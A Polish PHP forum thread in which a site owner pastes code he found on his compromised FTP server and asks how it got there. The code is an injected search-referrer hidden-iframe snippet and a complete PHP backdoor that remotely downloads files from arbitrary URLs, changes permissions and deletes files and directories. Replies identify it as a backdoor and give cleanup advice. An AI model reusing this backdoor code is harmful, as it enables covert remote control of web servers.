Forum PHP.pl

Witam,

Ostatnio na ftp pojawiły się u mnie dziwne pliki i w index.php na końcu coś takiego:

[PHP] pobierz, plaintext 
<!-- analytics7 --> <? error_reporting(0); $stat=$_SERVER["HTTP_REFERER"];$flag_g=stristr($stat,"google.");$flag_y=stristr($stat,"yahoo.");$flag_b=stristr($stat,"bing.");if(($flag_g) or ($flag_y) or ($flag_b)){echo "<iframe src=\"http://adres-mojej-strony.pl/css-dtr.php\" width=1 height=1 frameborder=0></iframe>";}  ?>
[PHP] pobierz, plaintext 

pliki miały następujące nazwy:

css-kin.php
css-lz.php
css-on.php
css-zeu.php


Czego przyczyną jest pojawianie się takich niechcianych plików? Pojawiły się u mnie w kilku domenach.. nawet takich któe nie miały cms'a


W jednym z plikó był taki kod:

[PHP] pobierz, plaintext 
<?
 
ignore_user_abort(1);
 
$err_flg=$_GET['err'];
if ($err_flg==1) {error_reporting(-1);}
else {error_reporting(0);}
 
set_time_limit(300);
 
if (isset($_GET["checksum"])) die(md5($_GET["checksum"]));
 
$else_dot=$_GET['else_dot'];
$flag_sum=$_GET['flag_sum'];
$chmod_name=$_GET['chmod_name'];
$chmod_mod=$_GET['chmod_mod'];
$chmod_mod=intval($chmod_mod, 8);
$f_creat_url=$_GET['f_creat_url'];
$f_creat_name=$_GET['f_creat_name'];
$f_del_name=$_GET['f_del_name'];
$folder_creat_name=$_GET['folder_creat_name'];
$folder_del_name=$_GET['folder_del_name'];
 
if ($flag_sum==1) {echo "734057843957";}
 
if ($chmod_name)
   {
   if ($else_dot==1) {chmod ("$chmod_name", $chmod_mod);}
   else
       {
       if ($else_dot) {chmod ("$chmod_name.$else_dot", $chmod_mod);}
       else {chmod ("$chmod_name.php", $chmod_mod);}
       }
   echo "ok chmod";
   }
 
 
if ($f_creat_url)
   {
   $new_vsn1="http://$f_creat_url";
   $new_vsn=getau("$new_vsn1");
   if ($else_dot==1) {$new_v_f=fopen("$f_creat_name","w+");}
   else
       {
       if ($else_dot) {$new_v_f=fopen("$f_creat_name.$else_dot","w+");}
       else {$new_v_f=fopen("$f_creat_name.php","w+");}
       }
   fwrite($new_v_f, "$new_vsn");
   fclose($new_v_f);
   echo "ok creat file";
   }
 
if ($f_del_name)
   {
   if ($else_dot==1) {unlink ("$f_del_name");}
   else
       {
       if ($else_dot) {unlink ("$f_del_name.$else_dot");}
       else {unlink ("$f_del_name.php");}
       }
   echo "ok del file";
   } 
 
if ($folder_creat_name)
   {
   $flag_mkd = mkdir ("$folder_creat_name", 0777);
   echo "ok make dir";
   }    
 
if ($folder_del_name)
   {
   $folder_del_name=trim($folder_del_name);
   if ($folder_del_name<>"")
   {
   removeDirRec("$folder_del_name");
   echo "ok del dir";
   }
   }
 
function getau ($path)
{
 if (!function_exists ("file_get_contents"))
 {
  function file_get_contents ($addr)
  {
   $a = @fopen ($addr, "r");
   $tmp = @fread ($a, sprintf ("%u", @filesize ($a)));
   @fclose ($a);
   if ($a) return @$tmp;
  }
 }
 
 if (!function_exists ("file_put_contents"))
 {
  function file_put_contents ($addr, $con)
  {
   $a = @fopen ($addr, "w+");
   if (!$a) return 0;
   @fwrite ($a, $con);
   @fclose ($a);
   return @strlen ($con);
  }
 }
 $content = file_get_contents ($path);
 if ($content=="")
 {
  $curl = curl_init ();
  curl_setopt ($curl, CURLOPT_URL, trim($path));
  curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
  curl_setopt ($curl, CURLOPT_TIMEOUT, 5);
  $content = curl_exec ($curl);
  curl_close($curl);
 }
 if ($content!="")
 {
  return $content;
 }
}
 
function removeDirRec($dir)
{
    if ($objs = glob($dir."/*")) {
        foreach($objs as $obj) {
            is_dir($obj) ? removeDirRec($obj) : unlink($obj);
        }
    }
    rmdir($dir);
}
 
 
 
?>
[PHP] pobierz, plaintext 

Hmm żadnego robaka nie znalazłem. Używam Fire FTP ale on pewnie bezpieczeństwem nie grzeszy. Co polecacie używać żeby do czegoś takiego nie doszło?

Nie wchodź na strony z torrentami, bo tam mogą być wirusy.
A tak serio - cała higiena bezpieczeństwa komputerowego, czyli mocne hasła (losowe znaki itd.), regularna zmiana haseł, antywirus+firewall+antyspyware+antyrootkit+cotamjeszczechcesz. Możesz sobie zrobić wirtualną maszynę nawet.

Albo zmień system, jak nie chcesz mieć tego całego badziewia np. Debian

To że nic nie znalazłeś to nie znaczy że nic nie masz. A kod to taki typowy phpowy backdoor do zdalnej modyfikacji i wgrywania plików.
Najlepiej byłoby przeskanować/przeinstalować system na komputerze, mieć już dobrego antywirusa, zmienić wszystkie hasła i wszystkie strony dokładnie przywrócić z backupu przed włamaniem (przynajmniej pod względem plików na ftp).